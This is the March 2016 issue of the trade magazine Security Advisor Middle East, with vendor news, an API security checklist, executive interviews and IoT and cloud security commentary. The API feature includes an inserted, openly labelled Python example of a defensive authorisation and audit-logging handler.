THE ART OF DEFENCE
Fortinet’s Chief Security Strategist on how to guard enterprise networks

Checklist for API security
Armed for the IoT revolution
Raising the cloud game

ISSUE 3 | MARCH 2016
www.securityadvisorme.com

Security Advisor Middle East | Issue 3



Founder, CPI Media Group: Dominic De Sousa (1959-2015)
Group CEO: Nadeem Hood
Publishing Director: Rajashree Rammohan, +971 4 375 5685

EDITORIAL
Group Editor: Jeevan Thankappan, +971 4 375 5678
Editor: Annie Bricker, +971 4 375 1643
Deputy Editor: James Dartnell, +971 4 375 5684
Online Editor: Adelle Geronimo, +971 4 375 5683

ADVERTISING
Commercial Director: Chris Stevenson, +971 4 375 5674
Group Sales Director: Kausar Syed, +971 4 375 1647
Sales Manager: Merle Carrasco, +971 4 375 5676

CIRCULATION
Circulation Manager: Rajeesh M, +971 4 375 5682

PRODUCTION AND DESIGN
Production Manager: James P Tharian, +971 4 375 5673
Designers: Analou Balbero, +971 4 375 5680; Neha, +971 4 375 1644

DIGITAL SERVICES
Web Developers: Jefferson de Joya, Abbas Madh
Photographer: Charls Thomas, +971 4 440 9100

Published by CPI Media Group
Registered at IMPZ, PO Box 13700, Dubai, UAE
Tel: +971 4 440 9100, Fax: +971 4 447 2409
Printed by Al Ghurair Printing & Publishing

© Copyright 2016 CPI. All rights reserved.
While the publishers have made every effort to ensure the accuracy of all information in this magazine, they will not be held responsible for any errors therein.

CONTENTS

06 Checklist for API security
Security Advisor ME delves into how users can plug API leaks and secure apps.

10 The art of defence
An exclusive interview with Tyson Macaulay, Chief Security Strategist and Vice President of Security Services, Fortinet, on the challenges faced by the cybersecurity market today.

16 Strategy for security
RSA Security’s Robert Griffin discusses the current threat landscape and how organisations can strengthen their security postures.

20 Raising the cloud game
As cloud becomes a major part of the IT strategy, businesses should look into bolstering their cloud security measures.

26 Offensive security
Attivo Networks’ Carolyn Crandall gives insights on how security teams can gain the upper hand by going on the offense.

32 The rise of the CDO
Data is one of the most essential assets of any business. Is it time for the C-suite to make room for a Chief Data Officer?

36 Industry 4.0
MasterCard’s Ajay Bhalla discusses what enterprises can expect in the impending fourth industrial revolution.

NEWS

DarkMatter launches secure voice and chat applications

DarkMatter has announced its entry into the secure communications market with the introduction of its voice and chat applications for iOS and Android.

The apps, according to the company, provide end-to-end secure communications, based on the latest advancements in cryptography, cryptographic implementations and network protocols. They are based on a software and hardware security co-design and incorporate an advanced hardware-based cryptographic chip to ensure security and prevent tampering.

DarkMatter also highlighted that the initial use case of the voice and chat application was developed to meet the high security requirements of government agencies in the region.

Dr. Najwa Aaraj, Vice-President, Special Projects, DarkMatter, said, “We are building security capacity within the region, and the secure voice and chat application is a proposition that provides additional security to government agencies and businesses requiring such products. Utilising the latest advances in cryptography and security protocols, and tapping into the tier-one talent present at DarkMatter, we believe we are well-positioned to provide highly secure solutions demanded by discerning customers across the region.”

Gemalto to deliver Jordan’s eID programme

Gemalto has been selected by Jordan’s Ministry of Information, Communication and Technology (MoICT) for the country’s new citizen ID programme.

The digital security company will supply the Ministry of Interior (MOI) – through OFFTEC – with its Sealys polycarbonate contactless eID cards along with a suite of Coesys enrollment, card personalisation and issuance solutions. Gemalto will deliver the eID cards as well as automatic fingerprint identification systems (AFIS) to reinforce national security, strengthen immigration controls and minimise the risk of fraud in the next elections of August 2016.

The enrollment system will be deployed in 100 civil status and passport offices, enabling MOI staff to capture the personal and biometric data of citizens for duplication-free entry onto the National Registry.

“For the Kingdom of Jordan, improving security, slashing ID fraud and creating a trusted infrastructure for online access are all high priorities on the agenda,” said Majd Shweikeh, Minister of Information, Communication and Technology. “The new Jordan eID card will strengthen the infrastructure required for digital signature and will enable the addition of new eGovernment Services onto the card when they are available.”

Bit9 + Carbon Black rebrands to Carbon Black

Bit9 + Carbon Black has announced its official re-branding to Carbon Black. According to the company, while the name has changed, no changes will be made to its strategy, product portfolio, technology direction and investments, and commitment to its 2,000 worldwide customers and hundreds of partners.

“Two years ago when Bit9 merged with Carbon Black, we combined our names to send a message to the market,” said Patrick Morley, CEO, Carbon Black. “We wanted to emphasise that Bit9, well known for its superior endpoint threat prevention, was joining with an emerging leader in endpoint threat detection and response. The combined name was always meant to be temporary until we achieved leadership in the field of next-generation endpoint security. Having reached that goal it’s time to simplify our brand.”

The company also changed the names of its products to reflect the Carbon Black brand – the Bit9 Security Platform is now Carbon Black Enterprise Protection; the Carbon Black product is now Carbon Black Enterprise Response; and the Threat Intelligence Cloud is now Carbon Black Threat Intel.

23% of global SMBs are improving their security approach through outsourcing their cybersecurity functions. Source: Cisco

Photo captions: Dr. Najwa Aaraj, DarkMatter; Patrick Morley, Carbon Black

4 03.2016 www.securityadvisorme.com

NEWS

Palo Alto Networks, Honeywell partner for industrial cybersecurity

Palo Alto Networks and Honeywell Process Solutions (HPS) have entered a strategic collaboration deal to boost the cybersecurity capabilities of control systems used by industrial facilities and critical infrastructure.

Honeywell’s industrial cybersecurity business is now offering the Palo Alto Networks next-generation security platform to industrial customers. The collaboration, according to both companies, enables customers to better prevent cyberattacks against their Process Control Networks (PCN) and Operational Technology (OT) environments in order to protect their assets and maximise production uptime and safety.

The joint solution offers process network traffic monitoring and advanced threat prevention across the automation environment. “Connecting vital infrastructure to the Industrial Internet of Things (IIoT) comes with tremendous benefit, but also associated cyber risks. Our work with Honeywell addresses the cyber risk with next-generation security designed to meet the needs of industrial customers and provide them with threat detection and prevention capabilities previously unseen in the industry,” said Chad Kinzelberg, Senior Vice President, Business and Corporate Development, Palo Alto Networks.

Kaspersky Lab bests TOP3 metric for Internet security

Kaspersky Lab has announced that for the third year in a row, it has achieved the top spot in the TOP3 metric for Internet security.

The annual TOP3 rating assesses the performance of over 100 vendors that took part in a variety of IT security tests for corporate, consumer and mobile products during the course of the year. Tests performed in these programmes assess all protection technologies against known, unknown and advanced threats.

Nikita Shvetsov, Chief Technology Officer, Kaspersky Lab, said, “Our extensive security intelligence, built up over more than a decade, powers our approach to developing endpoint protection. Coupled with our in-house technology expertise, we not only deliver multi-layered security to deal with today’s threats, but develop next generation technologies to deal with the threat landscape of tomorrow, providing the most comprehensive protection available. Securing the TOP3 top spot once again is testament to our approach and the capabilities of our product set which, time and time again, demonstrates the robust and reliable protection that we provide for consumers, SMEs and enterprise customers alike.”

Qualys appoints new CMO

Qualys has appointed Shail Khiyara as its new Chief Marketing Officer.

Khiyara, according to the company, will lead all elements of Qualys’ worldwide marketing strategies, including branding, end-to-end marketing functions, product marketing, corporate communications, demand generation and other go-to-market initiatives. He is joining Qualys’ executive team to further advance the company’s vision of helping 8,800 customers in over 100 countries secure their IT infrastructures, providing a continuous view of each customer’s security and compliance landscape.

“Rapidly evolving advanced cyber threats require a radical transformation in the security market, to meet customer needs and to protect organisations. Qualys is leading this transformation with 100 percent SaaS-based solutions that reach well beyond vulnerability management,” said Shail Khiyara, CMO, Qualys. “With over two billion annual scans, 50+ Global F100 brands and over 8,800 customers, Qualys is the life-blood of many organisations. I am excited to join the team and am looking forward to accelerating our growth and awareness of the Qualys Cloud Solutions.”

$1.9B – expected cost of cybersecurity spending in the global oil and gas industry by 2018. Source: Bloomberg

Photo captions: Chad Kinzelberg, Palo Alto Networks; Shail Khiyara, Qualys

FEATURE

CHECKLIST FOR API SECURITY

Top ways to plug the leaks and secure your apps

Many Starbucks customers got a jolt in May when cyberthieves were discovered stealing money from their credit cards and payment accounts by first tapping into their Starbucks mobile apps. The culprit was believed to be a hole in an application programming interface (API), though perhaps not on Starbucks’ site but on another app where overused passwords were stolen and reused, according to reports.

Greeting card website Moonpig and mobile app Snapchat have suffered similar fates at the hands of APIs – the set of requirements that governs how one application can talk to another and what data it can access.

In January, an unsecured API caused Moonpig to expose personal records and partial credit card details for some 3 million customers. Two exploits in Snapchat’s API allowed hackers to mass-match phone numbers with names and to create millions of bogus accounts.

Why are APIs becoming the target of hackers? Because they’re everywhere, says Randy Heffner, API security analyst at Forrester Research. Just about every company is building APIs to support its web or mobile applications because it allows them to innovate faster and bring outside content in.

Zikar Ajram, Head of Technology, CA MENA, adds: “APIs are an emerging technology for integrating applications using Web technology. This approach is exploding in popularity because it builds on well-understood techniques and leverages on existing infrastructure. But, it is a mistake to think we can secure APIs using the same methods and technology that we used to secure the conventional, browser-centric Web.

“While it’s true that APIs share many of the same threats that plague the Web, they are fundamentally different and have an entirely unique risk profile that you need to manage.”

There are more than 13,700 publicly available APIs offered by firms today, according to programmableweb.com. Salesforce.com generates 50 percent of its revenue through APIs, Expedia.com generates 90 percent, and eBay attributes 60 percent of revenues to APIs.

“The broader attention to APIs gives hackers a new and more interesting playground to [pursue],” Heffner says.

Most APIs are available to anyone on the Internet because they run on web servers. Just like websites, APIs can be crawled by search engine bots and hackers.

API security is an area that deserves specific enterprise scrutiny, Heffner adds. “We don’t want any submarine APIs – running silent, running deep – because if somebody hacks your home site you see it pretty quickly. If somebody hacks an API you may not see it at all.”

Harish Chib, VP of MEA, Sophos, says there are obvious reasons why API security warrants special attention from CISOs. “The use of APIs has so far been more prevalent on the web. Following smartphone/device proliferation and the advent of cloud, anywhere, any-device and any-time connectivity has become a reality. Businesses across verticals are going digital and want to embrace collaborative methods to remain customer-focused and agile in their IT infrastructure. APIs will continue to remain a critical conduit to share and exchange information on the Internet. The business opportunities of APIs can be offset by unaddressed security weaknesses or vulnerabilities. Therefore, it is important for both API providers and API consumers to ensure secure API implementation so that hackers can’t use them to attack an enterprise or harvest personal or financial data of users.”

Why are security flaws popping up in APIs?

For starters, developers are not security pros, and speed to market affects any kind of testing and due diligence that coders can do around their code. “They spend a lot more time bringing value in the apps than on the security side,” which can lead to security leaks, says Allyn Fay, technical marketing manager at identity and access management vendor Ping Identity.

There is also very little communication between API developers, which discourages security standards.

“In every company, each business unit has the mandate to publish APIs, and they don’t talk to each other,” says Subra Kumaraswamy, head of product security for API platform developer Apigee. “If I’m a business unit that’s doing shipping, or a payment company doing payment APIs,” we’re not comparing notes, he adds.

What’s more, developers are under pressure to innovate faster, which can also create vulnerabilities in the process, Kumaraswamy says. “You have an opportunity to make mistakes in exposing data inadvertently, or you’re not putting the right controls in the API.”

Plugging the leaks

App development shows no signs of slowing down, but companies can take steps to plug the leaks in APIs.

Authorise the user and authenticate the app: When it comes to securing applications versus APIs, “in Web apps you typically only have to authenticate the end user. In the API world you also have to authenticate the app,” Kumaraswamy says. For instance, “If you’re using the AirBnB or the Uber app, these apps are calling their APIs so those apps are being authenticated.” In the case of Moonpig, authentication was enforced, but authorisation was not, he adds.

Using a standardised protocol that exists for both authentication and authorisation is the jumpstart to using APIs securely, Fay adds. “If you do them the right way, the amount of security built in is based on the standard” and won’t vary from app to app.

Encrypt transports: Always encrypt sensitive data, Heffner says. Never create a security hole by using plain text transfers. Developers should use SSL certificates on web APIs that transfer sensitive data between the end-point program and the web service interface because hackers can sniff this data. If you make your API a subdirectory in your current web application, you can use the same security certificate that you have for your website.

Protect credentials: Know how credentials are managed for the app and how critical they are for the particular kind of business scenario, Heffner adds.

“If I were a bank doing financial transactions with a partner, there’s a number of layered connections I would want to have, like a VPN to SSL or I would have digitally signed tokens – SAML or the like, as part of the full security scheme.” With multiple security mechanisms in place, “it’s raising the bar on the number and kind of things someone would have to do to spoof any connection.”

Digitally signed tokens can also be one part of the security scheme. Tokens are character strings that uniquely identify a user. You can store these strings in a database and only give access if the user enters the correct user name and password. The token is then used by the API user to access an API’s methods.

Avoid static or embedded passwords: When logic is built into an app, it’s very difficult to change, Fay says. When you want to change a policy or update security, having all of that logic built into mobile apps is not a good thing. So developers sometimes take shortcuts with easy passwords or by caching IDs and passwords locally on a mobile app, and that’s a huge problem from a security standpoint. “Static passwords are to be avoided,” Fay says.

Expose only required information to your API: Developers will often take all the information they have on a user and give it to the API because they don’t know what data is required, Fay says. “Make sure you’re only moving the data that you need to,” he says. “It’s more of a privacy issue than a security one,” but it could be used in social engineering schemes.

Documenting the requirements for securing APIs can also be of great help, according to Chib from Sophos. This practice can make it easier to ensure ensuing code changes continue to meet data-handling policy requirements for personal or sensitive information. Moreover, documenting what information should be logged to capture who, what and when APIs are accessed for audit purposes can also prove effective in promoting API security awareness, he adds.

CA Technologies has recently launched an awareness programme called “API360: The complete API strategy model for the enterprise.” This guidance programme promotes awareness and useful information on how to tackle API rollout and adoption. “This guide allows you to understand how to go about creating and managing an API program while navigating the challenges of exposing your intellectual property outside the enterprise,” says Ajram.
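The checklist above applied in a single order-lookup handler, as an added example that is not code from the article or from any vendor quoted in it: the app is authenticated separately from the user, the user is then authorised for the specific record (the control the article says was missing at Moonpig), only the fields the caller needs are returned, and a who/what/when audit record is written. The app ids, tokens, orders and the HMAC-over-timestamp app signing scheme are constructed assumptions standing in for a real client-credentials flow.

```python
"""Added example (not from the article): order-lookup API handler applying the
checklist -- authenticate the app, authenticate the user, authorise the user for
the record, return only required fields, and audit who/what/when.
All identifiers and data below are constructed for the example."""
import hashlib
import hmac
import time
from dataclasses import dataclass

# Constructed sample data; in a real service these live in a database or vault.
APP_KEYS = {"mobile-app-v3": "k3y-for-mobile-app"}      # app id -> app secret
USER_TOKENS = {"tok-alice": "alice", "tok-bob": "bob"}   # bearer token -> user id
ORDERS = {
    1001: {"owner": "alice", "item": "birthday card", "card_last4": "4242",
           "card_number": "4242424242424242", "address": "1 High St"},
    1002: {"owner": "bob", "item": "anniversary card", "card_last4": "1111",
           "card_number": "4111111111111111", "address": "2 Low Rd"},
}
# "Expose only required information": only these keys ever leave the API.
PUBLIC_FIELDS = ("item", "card_last4")

AUDIT_LOG = []  # who/what/when records, kept in memory for the example


@dataclass
class Request:
    app_id: str
    app_signature: str   # HMAC-SHA256 over "app_id:timestamp" with the app secret
    timestamp: int       # client clock, bounded by max_skew to limit replay
    user_token: str
    order_id: int


def sign_app(app_id, secret, timestamp):
    """Client side: prove possession of the app secret without sending it."""
    msg = f"{app_id}:{timestamp}".encode()
    return hmac.new(secret.encode(), msg, hashlib.sha256).hexdigest()


def authenticate_app(req, now, max_skew=300):
    """Authenticate the app: known id, fresh timestamp, valid signature."""
    secret = APP_KEYS.get(req.app_id)
    if secret is None or abs(now - req.timestamp) > max_skew:
        return False
    expected = sign_app(req.app_id, secret, req.timestamp)
    return hmac.compare_digest(expected, req.app_signature)


def authenticate_user(req):
    """Authenticate the end user from a bearer token; None if unknown."""
    return USER_TOKENS.get(req.user_token)


def authorise(user, order):
    """Object-level authorisation: the user may only read their own orders."""
    return order["owner"] == user


def audit(user, app_id, order_id, outcome, now):
    AUDIT_LOG.append({"when": now, "who": user, "app": app_id,
                      "what": f"GET /orders/{order_id}", "outcome": outcome})


def get_order(req, now=None):
    """Return (status, body) for GET /orders/{id}."""
    now = int(time.time()) if now is None else now
    if not authenticate_app(req, now):
        audit(None, req.app_id, req.order_id, "app-auth-failed", now)
        return 401, {"error": "unknown or unverified app"}
    user = authenticate_user(req)
    if user is None:
        audit(None, req.app_id, req.order_id, "user-auth-failed", now)
        return 401, {"error": "invalid user token"}
    order = ORDERS.get(req.order_id)
    # Same 404 for missing and foreign orders so the id space is not enumerable.
    if order is None or not authorise(user, order):
        audit(user, req.app_id, req.order_id, "denied", now)
        return 404, {"error": "not found"}
    audit(user, req.app_id, req.order_id, "ok", now)
    return 200, {k: order[k] for k in PUBLIC_FIELDS}


if __name__ == "__main__":
    now = int(time.time())
    sig = sign_app("mobile-app-v3", APP_KEYS["mobile-app-v3"], now)
    print(get_order(Request("mobile-app-v3", sig, now, "tok-alice", 1001), now))
    print(get_order(Request("mobile-app-v3", sig, now, "tok-alice", 1002), now))
    print(AUDIT_LOG)
```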


COVER FEATURE

THE ART OF DEFENCE

Tyson Macaulay is the Chief Security Strategist and Vice President of Security Services at Fortinet. This role involves international business strategy and thought leadership for the company, and developing Consulting Services capacity. We caught up with him during his recent visit to Dubai to talk about a range of security issues surrounding the IT landscape.

We read about breaches every day. Should enterprises now plan to fail and try to limit the damage because we can’t keep the bad guys at bay?

When you are dealing with risks you have to make certain assumptions about the impact, and you should plan to win, never fail. So in the case of vulnerabilities and threats faced by enterprises, they should plan to mitigate the damage; they need to assume that at some point a vulnerability could be exploited, and they should be prepared to respond to that in a timely manner.

Do you think we need to move beyond network perimeter-based defence?

Yes, the perimeter is disappearing quickly, especially with more and more devices getting connected in IoT, more applications being moved to the cloud and even the network itself becoming a virtualised infrastructure asset. I see security being distributed across multiple points in the infrastructure – firewalls in the data centre, gateways, all the way down to the endpoints. Security has to be distributed, there is no other way. However, the challenge is to manage the security tools that will be distributed across the infrastructure.

Security is increasingly becoming complex and more difficult to manage. How do you help your customers address this?

Fortinet has end-to-end security capabilities, right from high-end data centres, carrier-grade networks, all the way down to small remote gateways for branch offices or even homes. No other vendor has this range of functionality. When you couple that with key products being virtualised and managed through a single interface, our customers are able to reduce complexity significantly.

Given the fact that most enterprises have many point solutions for security, is single-pane-of-glass management even possible?

Our guidance is that you should have two to three security vendors in your infrastructure. In large enterprises it’s common to see seven panes, or in some cases even 20 panes of glass. You need a vendor that offers end-to-end functionality and can unify the reporting. Having said that, if you are a global enterprise you will never want to get down to just one single vendor. It would be disingenuous on my part to pretend that it is a good piece of advice.

Do we need to radically rethink our approach to security?

The biggest challenge when it comes to security is skills. As a society, we need to radically rethink how we educate and train young people. Fortinet engages with educational institutions to try and give these young minds more opportunities to learn. I participate in the development of engineering standards for young people, and that’s where it really has to start. I do not think there is a silver bullet to security from a technology perspective.

You can see an emerging interest in massive statistical analysis on patterns in networks, operating systems and the like, but that is only a part of the solution. In the end, there are probably many components available that are not integrated and managed, and that’s what we need to overcome first. It all starts with skills, and inside Fortinet we have an excellent training programme for our partners and users. It gives them great insights into not only product functionalities but security in general as well.

Is security really a boardroom issue now?

Not only do I see it becoming a boardroom issue, there is a bill in front of the US Senate now which mandates that boards of any publicly listed entity should have someone with a functional knowledge of cybersecurity. I see it becoming more of a matter of compliance, and it makes perfect sense because every enterprise now is information-driven and there are so many ways to use that information against the owner, customers and partners.

Are we going to see any new types of threats this year?

We have recently released our 2016 threat predictions report. We are going to see more machine-to-machine attacks and new forms of worms coming to take advantage of mobile platforms. In the early 90s we saw worms that took advantage of Unix, then Windows, and now you will see worms on platforms such as Android.

We are talking about a multi-layered defence to combat threats. Will this affect network performance and increase complexity?

IT overall is becoming more complex because of virtualisation, which introduces a lot of operational efficiencies but at the same time leads to complexity. Now virtualisation is moving out of the data centre, right to the edge of the network, and now we are talking about virtualised routers and base stations. That is going to require more security and mean more complexity. One way to combat this complexity is through automation and single control points with end-to-end solutions.

OPINION

TOP 10 things cybersecurity professionals need to know about the Internet of Things

By Adam Philpott, Director, EMEAR Cybersecurity, Cisco

The Internet of Things (IoT) is accelerating and creating significant opportunities for organisations, individuals, communities, and countries as more things come online – along with the people, processes, and data that interact with them. It has been predicted that there will be 500 billion devices connected by 2030, which includes not just physical objects but also people and processes. This presents new challenges, particularly when it comes to cybersecurity.

In order to capitalise on the estimated trillions of dollars of value to be gained globally over the next decade, these connections not only require networks but, more importantly, ‘secured’ network connections.

To help cybersecurity professionals cut through the hype and gain a better understanding of what to expect as the IoT continues to evolve, these top 10 observations might help:

1. Worlds will collide. Most organisations have a wide range of disparate technologies and processes to protect their information technology (IT) and operational technology (OT) networks, as well as their physical spaces. Add to that consumer technology (CT) such as smartphones and tablets on IT networks and it’s easy to see that these networks combine to become IoT networks. We need to begin to implement cybersecurity solutions to protect all networks equally from attack while recognising their specific requirements and priorities.

2. The attack surface will expand. With billions of new devices now connected to the IoT (including smart meters, heating and air conditioning systems, health monitoring devices, remote sensors for gas and oil lines and so on) and more devices connecting all the time, the ability to gain visibility into these attack vectors, let alone close them to malicious actors, is increasingly difficult.

3. Threat diversity will increase. Due to the variety of objects adversaries can target, many of which are in insecure locations, attackers are able to devise new methods the cybersecurity industry has yet to face and blend sophisticated techniques to accomplish their mission.

4. Threat sophistication will continue. Threats have already become stealthier, evading initial point-in-time detections and using nearly imperceptible indicators of compromise to reach their target. Cybersecurity systems that rely exclusively on point-in-time defenses and techniques can’t keep up with unfolding attacks.

5. Remediation will become more urgent and more complex. When an attack does happen, organisations can’t necessarily isolate a system, because the cost and implications of shutting it down may be greater than the cost of an infection, presenting serious tradeoffs between protection and continuity of operations. Remediation methods will need to support a focused approach to quickly detecting, scoping, and containing a threat, cleaning up systems, and bringing operations back to normal.

6. Risk and impact will escalate. Sensitive data and personal information are flowing between process and business domains, from and through billions of connected devices, in secure and insecure locations throughout the world. The vast majority of these devices and domains rest outside the secure embrace of the IT and OT networks. In an OT world, the impact of a breach can be much greater. For instance, if a hospital or medical care facility is attacked and systems needed for patient care or life support are impacted, the outcome is more severe than a computer system infected with malware in an IT environment. The ability to protect this data wherever it goes and however it is used must be addressed.

7. Compliance and regulations will mount. Regulatory bodies are requiring tighter security and privacy controls than ever before, which is affecting a growing number of industries. If unable to effectively and efficiently meet these requirements, an organisation’s ability to gain value as an active participant in the IoE will be limited dramatically. In addition, as more devices are connected, lines of ownership and responsibility will become increasingly blurred. This introduces new challenges for managing and maintaining compliance with regulatory requirements.

8. Visibility will be paramount. Cybersecurity professionals need to see a real-time, accurate picture of devices, data, and the relationships between them, in order to make sense of billions of devices, applications, and their associated information. This requires more automation and faster analytics; humans won’t be able to scale with the environment.

9. Threat awareness will become the focus. In this amorphous perimeter, cybersecurity professionals need to presume compromise and hone the ability to identify threats based on an understanding of normal and abnormal behaviour, identify indicators of compromise, make decisions, and respond rapidly. This requires overcoming complexity and fragmentation in technology environments.

10. Action will need to be swift. Upon identifying a threat or anomalous behaviour, cybersecurity professionals need to be able to take action. This requires the right technologies, processes, and people working together, and swiftly, to be effective.

The IoT doesn’t replace the existing IT or OT networks; rather, it supplements these networks and relies on them in many ways. We need to build on these existing networks and existing network security but also bring a new perspective, recognising that since every aspect of the network is now working together, our cybersecurity and physical security solutions must also work together with a coordinated focus on threats.

What’s needed is a new, threat-centric security model that is as pervasive as the IoT and the threats themselves. This threat-centric security model must span a range of attack vectors and address the full attack continuum – before, during, and after an attack. With this model we can protect computer systems, networks, and data. And for many enterprises involved in industrial control and automation activities, we need to extend this same model to better protect operational systems that are the lifeblood of the enterprise and in many instances, our daily lives.



STRATEGY FOR SECURITY

At RSA Conference 2016, we caught up with Robert Griffin, Chief Security Architect, Security Evangelist, RSA, to learn more on the current threat landscape and insights into how organisations can strengthen their security posture.

INTERVIEW

What are the biggest security threats organisations should be wary of in 2016?
There are merchant threats, especially in terms of disruptions of enterprises and infrastructures. These are new and important. For example, the recent attack against Ukrainian power companies in December resulted in the disruption of electric power. For many attackers, this represents a shift in focus from financial espionage into active disruption of business within the organisation and also the society where these capabilities are offered.

Today we see that there is a tendency to attack new classes of enterprises, which have been relatively not as attractive to attackers, until now. Critical infrastructure is now being targeted more often than it was two years ago.


Are there more threats when it comes to information security?
There seems to be less risk of information breaches as opposed to the infrastructure itself being targeted. This was true in the Saudi Aramco breach as well as the Ukrainian incident.

Back in 2006, it was clearly espionage attacks against the manufacturing sector. However, today it is a different class of attacks intended to achieve social and economic damage.

There is a reflection of change in the goal of the attackers: to create a social impact rather than to gain financial advantage.

What are the cybersecurity trends that you see around the globe?
There are new trends in attack mechanisms, especially in terms of the growth of the dark net. For example, RSA announced the discovery of two fairly significant new sets of malware in late 2014. One was called Terracotta, which was a malware-supported VPN network. Attackers could rent and have access to this VPN in order to secure communications among themselves.

The second one was called GlassRAT, a new remote access Trojan, explicitly directed towards being able to gain control of enterprise environments. Both were clearly a new generation of malware with some resemblances to previous classes of malware.

There are definitely on-going developments of new malware within the attacker environment. The other change is in the direction and goal of the attackers.

What do you think is the future of cybersecurity?
Well, the first point to note is that attacks will continue to grow in complexity, in frequency and in the range of attackers. Presently, we have three most common categories of attackers: nation-state, cybercriminals and hacktivists. Most likely, there will be further differentiation of these categories and the introduction of potential new kinds of attackers.

We are most certain to see a shift in the direction of response. At RSA, we have strongly advocated that the model of defensive and preventive strategies such as firewalls will no longer suit the modern enterprise or government.

Today’s employees are always on the move, so most of their communication doesn’t happen within the home office over secured networks but via the cloud. Therefore, we need to have models that fit the cloud-based approach and support mobile users. The only way to do this is through mechanisms such as identity and analytic-based approaches. I believe that the strategy of analytics and investigation will be the dominant response model in terms of how we deal with achieving cybersecurity going forward.

How can businesses enhance their security posture?
The first aspect to this is to have a fundamental change in attitude and perspective. We have to think of security as a spectrum of capabilities. Organisations should start by identifying which assets, if attacked or breached, would damage the company or its customers the most. What can be done to mitigate the risks around that impact? If we begin there, we will quickly come to the conclusion that very little should be spent on anti-virus or things that provide such little protection against attacks. Instead, the most effective methods show up in areas such as identity management, analytics and risk management. That is the strategy one has to have in place and is the best way forward in order to respond to threats.

Gaining complete visibility across networks is what most organisations are aspiring towards. But what are the key elements to keep in mind to help achieve this?
There are three main aspects. One is that the more you can instrument capabilities in that environment to provide information, the better off you are. If you don’t have that, then you miss out on a whole body of information which you could otherwise use.

The second aspect is that you need to gather kinds of information that may not be the direct indicators themselves but provide really good context about what is going on.

The third element is that organisations really need to think about the privacy questions. They need to assess whether, if this kind of information is collected, it poses a risk of exposure of important user information, or risks in terms of national regulation and company liabilities.


ARMED FOR THE IOT REVOLUTION

Jack Waters, CTO, Level 3 Communications, discusses three network adjustments organisations should undertake for a smooth and secure transition towards a hyper-connected future.

INSIGHT

Cisco estimates that over 50 billion devices and objects will be connected to the Internet by 2020. However, a problem remains, as many traditional networks are still manual, static and complex, which isn’t ideal for the Internet of Things (IoT). To realise the promise of a hyper-connected future, three shifts must take place.

Fibre. The bandwidth needed for the onslaught of IoT-connected devices should be enough to make anyone think about fibre. At the Consumer Electronics Show held recently, a lot of discussions focused on this because of the emergence of 4K ultra-high-definition television.

The underlying conversation around 4K and 100Gbps has to do with fibre-optic networks. Getting cities – and consumers – hardwired with fibre will be a necessity for the future. The term Smart City has been used to characterise these communities that are investing in infrastructure and advancing science and technology efforts to securely collect and use data to do everything from decrease energy consumption to cut overhead costs and improve the life of residents.

IPv6. Right now, we aren’t actually seeing an overwhelming adoption of IoT devices in personal homes or offices. Cisco stated that more than 99 percent of things in the physical world remain unconnected. However, it’s only a matter of time before every single aspect of our life is Internet dependent.

In today’s environment, if consumers want their devices to be accessed outside of their homes or private networks, a user has to go into their Wi-Fi router and portmap it to an outside network. This is complicated and not very user-friendly.

To fix this, we must give public IP space to all of the ‘things.’ Great in theory, however, the rate of new ‘things’ is growing at such a rapid pace, the current method of assigning addresses won’t be able to accommodate the volume. In order to provide addresses for every device, the Internet will need to transition from IPv4 to IPv6.

So what’s the hold up? At the moment, there isn’t imminent financial motivation or competitive pressures for broadband providers to transition. As long as the market can efficiently work out the remaining sellable IPv4 address space to those that require it, the pressure to migrate to IPv6 will not fully materialise.

Over time, as the number of IoT devices increases and IPv4 addresses grow scarcer, financial and competitive pressures will rise accordingly, eventually leading to economic incentive for IPv6 transition. Consumers will demand the ability to interwork with every device seamlessly with speed, ease and expect that the ‘Internet’ will continue to be the ubiquitous, any-to-any network they grew accustomed to in its IPv4 origins. An IPv4 and IPv6 Internet, patched together with transitional technologies such as Network Address Translation, won’t be able to scale to the levels forecasted for IoT devices, not without cumbersome constraints. This perfect storm of consumer expectations and financial incentive is what is required for IPv6 to become a reality after all of these years.

Security. There is a lot of concern about what it will mean for the threat ecosystem to have millions of connected devices – especially those managed by consumers – available for malicious activity. If we don’t address the security issues rearing up today, we’re going to have a serious security situation. Right now, many companies are making Internet-connected devices that aren’t able to be patched or easily updated with new security rollouts. Considering many IoT devices collect personal data, security should be a concern for all.

IoT developers should do more to secure their products. For organisations using IoT, it is essential to do a rigorous analysis of the security controls built into IoT devices and services they wish to use. At a minimum, an audit of IoT device’s communications channel, use of encryption, an analysis of the type of data it collects, stores and transmits, and the security of the end-point(s) with which it communicates, is paramount.

Given IoT’s growth rate, and the resulting broadening of the cyber-attack surface, organisations must be ever more vigilant in conducting comprehensive risk analyses and in the implementation of proper governance structures. A risk-based approach is the best way to balance the risk of using IoT with its unlimited productivity benefits.


RAISING THE CLOUD GAME

With cloud technologies increasingly becoming a major part of an enterprise’s digital strategy, IT decision-makers should devise ways to enhance their cloud security measures.

INSIGHT

More and more businesses are currently using the cloud, but by 2020 that number is expected to grow even more. With all the technologies being developed today to secure the cloud, it doesn’t always guarantee immunity from data breaches.

Now that the cloud is rapidly becoming a mainstream part of IT, businesses must think more critically about how to bolster their security beyond cloud providers’ default security infrastructure.

Conventional cloud providers make a good effort to offer robust security measures. They generally come equipped with server-side encryption, user controls, data restoration abilities, and device wiping capabilities meant to protect your files in the cloud. Still, despite these measures, there’s a major – but little discussed – gap in cloud security, and it has to do with that other major mobile work trend, BYOD.

In the United States, more than 40 percent of employees use personal smartphones, tablets, or flash drives for work purposes, and 83 percent admit they prefer cloud apps to their on-premise equivalents and are likely to seek them out. But whether or not an employer explicitly sanctions cloud and app usage, the same problem persists: Once files are synced to a mobile device – which let’s face it, is a major reason to use the cloud in the first place – the cloud provider’s default encryption disappears, and files are exposed on the cloud.

More than 70 million smartphones are lost each year. Add to that the number of lost and stolen tablets, flash drives, and laptops, and it’s easy to see just how easily unencrypted data can fall into the wrong hands. Lost and stolen devices are one of the main contributors to data breaches, and it’s largely because of this lack of encryption on devices.

Asaf Cidon, CEO, Sookasa

The good news is that despite the existing flaws in cloud security, protecting your files is possible. There are a few simple ways to get more out of default cloud security infrastructure to keep your business secure:

Encrypt data at the file level. It’s no longer sufficient to protect only the perimeter, which, these days, is pretty much the same as relying only on server-side encryption. Encrypting files only at rest isn’t enough either, unless your team isn’t syncing any files to the cloud, which just isn’t a feasible option in today’s cloud-based ecosystem.

